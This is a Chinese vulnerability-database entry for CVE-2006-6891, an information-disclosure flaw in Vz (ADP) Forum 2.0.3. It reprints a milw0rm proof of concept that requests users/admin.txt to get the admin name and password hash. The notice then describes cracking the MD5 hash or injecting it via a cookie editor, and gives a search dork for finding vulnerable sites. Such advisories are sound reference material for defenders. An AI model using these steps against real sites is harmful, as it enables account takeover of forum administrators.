Vz (Adp) Forum 'users/admin.txt'根目录敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111919 漏洞类型 未知
发布时间 2006-12-31 更新时间 2006-12-31
CVE编号 CVE-2006-6891 CNNVD-ID CNNVD-200612-630
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3053
https://www.securityfocus.com/bid/87105
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-630
|漏洞详情
Vz(Adp)Forum2.0.3在web根目录下存在敏感信息并且没有足够访问控制,远程攻击者可以通过直接请求users/admin.txt来获取管理员账户名和密码哈希。
|漏洞EXP
##########################################################################################################
#Sv(ADP) Forum 2.0.3 Remote Password Disclosure Vulnerablity                 
##########################################################################################################
#S.name:ADP Forum                                                            
#Affected version:2.0.3                                                      
#Download&Demo:http://www.linux.it/~fedro/index.php?pag=scripts&lang=en      
#Risk:Very Highly Critical                                                   
##########################################################################################################
#Author:Dr Max Virus                                                         
#Location:Egypt                                                              
##########################################################################################################
#POC:                                                                        
#http:/[target]/[path]/users/admin.txt                                       
#As We see Admin name and hash          !!!!!!!!!!!!!!!!!!!!!!!!!!
##########################################################################################################
#You can crack the password with any md5 encrypt                             
                             
#Or u can register and inject the info in any cookie editor can be in 
FireFox or Opera                   
##########################################################################################################
#Dork:ADP Forum 2.0.3 is powered by VzScripts                                
##########################################################################################################
#Thx:str0ke-koray-Timq-r0ut3r-mTk-nuffsaid-MrSwan-All Friends                
#Special Gr33ts:AsianEagle-Kacper-The master-Hotturk                         
##########################################################################################################

# milw0rm.com [2006-12-31]
|受影响的产品
Vz Forum Vz Forum 2.0.3
|参考资料

来源:XF
名称:adpforum-admin-information-disclosure(31220)
链接:http://xforce.iss.net/xforce/xfdb/31220
来源:MILW0RM
名称:3053
链接:http://www.milw0rm.com/exploits/3053
来源:MILW0RM
名称:3053
链接:http://milw0rm.com/exploits/3053